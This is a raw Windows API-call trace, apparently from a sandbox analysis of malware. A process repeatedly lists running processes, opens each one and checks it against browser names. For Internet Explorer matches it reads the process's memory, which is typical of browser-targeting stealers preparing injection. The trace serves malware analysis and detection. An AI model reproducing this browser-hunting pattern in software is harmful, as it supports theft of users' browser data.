	[0211.700] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0211.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.700] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.701] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0211.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.702] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0211.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3b64
	[0211.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.703] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0211.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.703] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.704] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0211.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.704] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.705] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0211.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3b68
	[0211.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.705] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0211.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.706] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.707] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0211.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.707] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.708] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0211.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3b6c
	[0211.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.709] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0211.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.709] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.710] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0211.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.710] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.710] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3b70
	[0211.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.711] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.712] NtQueryInformationProcess (in: ProcessHandle=0x3b70, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.712] ReadProcessMemory (in: hProcess=0x3b70, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.713] ReadProcessMemory (in: hProcess=0x3b70, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.713] ReadProcessMemory (in: hProcess=0x3b70, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.713] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3b74
	[0211.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.714] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.714] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.714] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.714] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.715] NtQueryInformationProcess (in: ProcessHandle=0x3b74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.715] ReadProcessMemory (in: hProcess=0x3b74, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.715] ReadProcessMemory (in: hProcess=0x3b74, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.715] ReadProcessMemory (in: hProcess=0x3b74, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.715] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3b78
	[0211.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.716] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.716] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.717] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.717] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0211.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3b7c
	[0211.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.718] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0211.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.718] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.719] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0211.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.719] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3b80
	[0211.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.720] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.721] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.722] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3b84
	[0211.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.723] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.723] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.723] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0211.724] CloseHandle (hObject=0x188) returned 1
	[0211.724] Sleep (dwMilliseconds=0x64) 
	[0211.833] GetCurrentProcessId () returned 0x110
	[0211.833] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0211.839] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0211.840] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0211.843] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0211.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3b88
	[0211.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.845] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.845] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.846] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.846] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.846] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3b8c
	[0211.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.847] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.847] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.847] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.848] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.848] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0211.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3b90
	[0211.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.849] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0211.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.850] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.850] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0211.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.850] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.851] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3b94
	[0211.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.851] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.852] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.852] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.852] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.852] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0211.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3b98
	[0211.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.853] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0211.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.854] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.854] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0211.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.854] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0211.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3b9c
	[0211.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.855] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0211.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.856] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.856] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0211.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.856] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.857] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0211.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3ba0
	[0211.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.857] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0211.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.858] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.858] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0211.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.858] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.858] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0211.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3ba4
	[0211.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.859] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.859] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.860] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.860] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.860] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3ba8
	[0211.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.861] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.861] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.861] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.862] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.862] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3bac
	[0211.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.863] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.863] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.864] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.864] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.865] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3bb0
	[0211.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.865] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.866] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.866] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.866] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3bb4
	[0211.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.868] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.868] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.868] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
